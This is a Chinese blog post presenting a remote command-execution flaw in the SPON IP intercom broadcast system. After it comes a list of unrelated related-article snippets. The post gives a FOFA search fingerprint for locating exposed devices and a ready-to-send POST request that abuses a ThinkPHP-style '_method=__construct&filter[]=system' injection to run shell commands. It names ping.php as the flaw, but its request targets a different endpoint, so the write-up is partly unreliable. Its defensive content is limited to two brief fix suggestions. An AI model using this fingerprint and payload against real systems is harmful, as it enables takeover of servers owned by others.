[SPON IP]网络对讲广播系统的命令执行漏洞实验

news2024/12/23 15:36:08

产品简介

                  世邦通信 SPON IP网络对讲广播系统采用领先的IPAudio技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。

-----------------------------------

漏洞描述

                 世邦通信 SPON IP网络对讲广播系统 ping.php 存在任意命令执行漏洞,攻击者通过漏洞可以执行服务器任意命令控制服务器

-----------------------------------

网络空间测绘:

fofa:           icon_hash="-1830859634"

      

              开启抓包:

         发送到重放器:

          漏洞利用:

                  poc:

POST /callcenter/public/index.php/index.php?s=index/index/index HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-Length: 52

s=id&_method=__construct&method=POST&filter[]=system

 

 

 

修复建议:

                     1、升级至最新安全版本。
                     2、限制接口访问。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1965501.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

邮件发送失败rdns报错问题排查解决的策略?

邮件服务中RDNS配置不当导致发送失败,怎样调整设置? 邮件发送失败是一个常见的问题,尤其是当涉及到rdns报错时,这一问题变得尤为复杂。AokSend将详细探讨邮件发送失败的常见原因,并提供有效的排查和解决策略。 邮件发…

【MySQL】事务 【上】{事务的版本支持 事务提交方式 实验结论 用户问题 如何理解隔离性 隔离级别 查看与设置隔离性 四种隔离级别的场景 }

文章目录 1.引入事务事务的版本支持事务提交方式实验结论用户问题 2.隔离性如何理解隔离性隔离级别查看与设置隔离性 4.四种隔离级别的场景读未提交读已提交可重复读串行化 1.引入事务 当客户端A检查还有一张票时,将票卖掉,还没有执行更新数据库的时候&a…

CS61C | lecture6

Lecture 6 主流 ISA Register 汇编语言没有变量。它用寄存器来存储值。 寄存器是固定大小的小内存(32 位或者 64 位)。可以进行读取和写入,但是有数量限制,它们很快并且耗电少。 Registers vs. Memory What if more variables than registers? 如果…

Linux系统将Mint 便签源码打包成deb包并进行安装

网上有提供Ubuntu安装Mint便签的命令,此处不再赘述。而是通过Github Mint便签的说明书,对Mint便签的源码打包成deb包并进行安装。作为练习,方便以后对其他源码进行打包安装。 一、Mint Sticky的介绍 Sticky是一款适用于Linux桌面的笔记应用…

任何值得发表的学术论文,一定要具备一些基础的特性

1. 科学价值:论文的心脏 首先,你的论文需要有“心”——科学价值。这意味着你的研究要么发现了新大陆,要么采用了新方法,要么提供了新视角,或者至少突破了现有局限。记住,你的论文要给科学界带来新的血液&…

预览 txt,ppt,图片,word 等

1.引入查看的封装的组件 <template><div><div class"well" ref"output"></div></div> </template><script>import { getExtend, readBuffer, render } from ./util;/*** 支持嵌入式显示&#xff0c;基于postMes…

谢希仁计算机网络第八版期末复习简答(2)

网络层 路由转发分组&#xff08;简答&#xff09;※ 一个网络中的主机A向另一个网络中的主机B发送数据&#xff0c;首先A将数据包发送给自己的默认网关路由器。路由器收到数据包之后&#xff0c;查看数据包头部&#xff0c;解析目的IP地址依次查询路由表&#xff0c;根据最长…

基于Deap遗传算法在全量可转债上做因子挖掘(附python代码及全量因子数据)

原创文章第604篇&#xff0c;专注“AI量化投资、世界运行的规律、个人成长与财富自由"。 在4.x的时候&#xff0c;咱们分享过deap遗传算法挖掘因子的代码和数据&#xff0c;今天我们来升级到5.x中。 源码发布Quantlab4.2&#xff0c;Deap因子挖掘|gplearn做不到的咱们也…

AI为什么无法替代律师?

AI能否真正取代律师&#xff1f;一探究竟&#xff01; ©作者|LuMiQ 来源|神州问学 引言 数字化时代&#xff0c;AI技术正如催化剂般加速各行业的变革&#xff1a;在医疗界&#xff0c;它犹如医生的“第二双眼睛”&#xff0c;精准分析影像&#xff1b;制造业里&#xff…

【C语言】深入浅出:C语言链表的全面解析

目录 一、单链表1. 基本概念节点结构定义 2. 创建链表示例代码输出结果 3. 插入节点示例代码输出结果 4. 删除节点示例代码输出结果 二、双向链表1. 基本概念节点结构定义 2. 创建双向链表示例代码输出结果 3. 插入节点示例代码输出结果 4. 删除节点示例代码输出结果 三、循环链…

名师引路,育梦成光 | 云校名师张梁老师收到学员诚挚感谢信!

在这个蝉鸣悠长的夏日里&#xff0c;一封满载感恩之情的信笺&#xff0c;悄悄诉说着一段珍贵的师生情谊。近日&#xff0c;深圳云校又一届“HCIE精英班”圆满结课&#xff0c;临别之际&#xff0c;姜同学以笔为媒&#xff0c;向我们展示了一位不仅传授知识&#xff0c;更以人格…

在kdevelop中运行程序并调试

补充前序知识&#xff1a; 1.CMakeLists.txt文件中&#xff0c;如下图&#xff0c;第一行生成的是静态库文件&#xff08;我们前一讲所使用的&#xff09;&#xff0c;第二行是动态库文件。 静态库与动态库&#xff1a; 静态库&#xff08;Static Libraries&#xff09; 定义…

torch.minimum与torch.min()

目录 1. torch.minimum 2. torch.minimum可以进行一个数组与多维度的比较 3.torch.min() 4. torch.min()多维度比较 1. torch.minimum torch.minimum() 函数用于逐元素地比较两个张量&#xff0c;并返回一个新的张量&#xff0c;其中每个元素是两个输入张量对应元素中的最小…

pychar安装、pychon安装、pycharm超过试用期30激活

如果pycharm超过试用期&#xff0c;可以双击vbs脚本重新激活 百度网盘&#xff1a; 链接: https://pan.baidu.com/s/1B-XyLOy3wjVWbJwuvZOHOw?pwdmsb6 提取码: msb6

基于域名的虚拟主机、多虚拟主机的配置、基于ip的虚拟主机及上线静态的前端系统(商城系统)

Day 14 基于域名的虚拟主机 说明&#xff1a; 一个配置文件一般只有一个http模块&#xff1b; 一个http模块可以有多个server模块&#xff1b; 一个server模块就是一套web项目&#xff1b; 一个server模块中可以有多个location&#xff1b; location就是项目中的url路由…

判断元音还是辅音字母

1.// kiki开始学习英文字母&#xff0c;bobo老师告诉他&#xff0c;有五个字母A&#xff08;a&#xff09;,E(e),O(o),U(u),I(i)为元音&#xff0c;其他所有字母为辅音 //请帮他编写程序判断输入的字母是元音&#xff08;vowel&#xff09;还是辅音&#xff08;consonant&#…

使用这个Blender工具非破坏性地自动化切割面板线

"Panel Cutter"插件自动化了在Blender中沿选定边缘创建程序化面板线的过程&#xff0c;使其成为硬表面建模的必备工具。 这是一个设计用来非破坏性地自动化切割程序化面板线的小工具。这个工具对于硬表面模型&#xff0c;如汽车、船只和飞机来说&#xff0c;是救星。…

Linux用户-普通用户

作者介绍&#xff1a;简历上没有一个精通的运维工程师。希望大家多多关注我&#xff0c;我尽量把自己会的都分享给大家&#xff0c;下面的思维导图也是预计更新的内容和当前进度(不定时更新)。 Linux是一个多用户多任务操作系统,这意味着它可以同时支持多个用户登录并使用系统。…

Java:面向对象(static,代码块,构造方法私有化,内部类)

5&#xff0c;static关键字 static是一个特殊的关键字&#xff0c;static的作用是将实例成员变为类成员&#xff0c;只能修饰在类里定义的成员部分&#xff08;成员变量、方法、内部类&#xff08;枚举和接口&#xff09;、初始化块&#xff09;。static修饰的成员表明它属于这…

三,搭建环境:事务控制

三&#xff0c;搭建环境&#xff1a;事务控制 文章目录 三&#xff0c;搭建环境&#xff1a;事务控制声明式事务配置注解写法查询操作增删改操作 声明式事务配置 在 demo-module01-web 的模块下的&#xff0c;spring-persist.xml 配置文件中 开启基于注解的声明式事务支持 <…